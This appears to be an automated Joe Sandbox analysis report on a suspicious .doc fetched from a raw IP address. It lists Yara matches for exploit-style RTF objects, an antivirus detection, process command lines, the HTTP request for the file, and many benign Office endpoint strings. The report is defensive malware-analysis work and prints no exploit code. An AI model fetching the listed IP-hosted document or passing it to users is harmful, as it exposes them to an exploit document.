Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://192.3.176.146/ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.doc

Overview

General Information

Sample URL:http://192.3.176.146/ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.doc
Analysis ID:884007
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Yara signature match

Classification

  • System is w10x64
  • chrome.exe (PID: 2204 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 2188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1644,i,5898683217458233683,13373722680240727198,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • WINWORD.EXE (PID: 6372 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Downloads\icicicicicicicicicicicicicic########################icicicicicicicic.doc" /o " MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • chrome.exe (PID: 4740 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "http://192.3.176.146/ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.doc MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_108SUSP_INDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.ditekSHen
  • 0x124f:$obj1: \objhtml
  • 0x1288:$obj2: \objdata
  • 0x1274:$obj3: \objupdate
dropped/chromecache_108INDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x124f:$obj1: \objhtml
  • 0x1288:$obj2: \objdata
  • 0x1274:$obj3: \objupdate
C:\Users\user\Downloads\4e186edb-433c-401c-ba00-d3d21353fa91.tmpSUSP_INDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.ditekSHen
  • 0x124f:$obj1: \objhtml
  • 0x1288:$obj2: \objdata
  • 0x1274:$obj3: \objupdate
C:\Users\user\Downloads\4e186edb-433c-401c-ba00-d3d21353fa91.tmpINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x124f:$obj1: \objhtml
  • 0x1288:$obj2: \objdata
  • 0x1274:$obj3: \objupdate
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\Downloads\4e186edb-433c-401c-ba00-d3d21353fa91.tmpAvira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: unknownDNS traffic detected: queries for: accounts.google.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.146
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.doc HTTP/1.1Host: 192.3.176.146Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.aadrm.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.aadrm.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.cortana.ai
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.diagnostics.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.office.net
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.onedrive.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://api.scheduler.
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://apis.live.net/v5.0/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://augloop.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://augloop.office.com/v2
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://cdn.entity.
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://clients.config.office.net/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://config.edge.skype.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://cortana.ai
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://cortana.ai/api
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://cr.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://d.docs.live.net
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://dataservice.o365filtering.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://designerapp.officeapps.live.com/designerapp
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://dev.cortana.ai
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://devnull.onenote.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://directory.services.
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://enrichment.osi.office.net/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://graph.ppe.windows.net
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://graph.ppe.windows.net/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://graph.windows.net
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://graph.windows.net/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://invites.office.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://lifecycle.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://login.microsoftonline.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://login.windows.local
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://make.powerautomate.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://management.azure.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://management.azure.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://messaging.action.office.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://messaging.engagement.office.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://messaging.office.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://ncus.contentsync.
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://ncus.pagecontentsync.
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://officeapps.live.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://onedrive.live.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://onedrive.live.com/embed?
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://otelrules.azureedge.net
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://outlook.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://outlook.office.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://outlook.office365.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://outlook.office365.com/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://pages.store.office.com/review/query
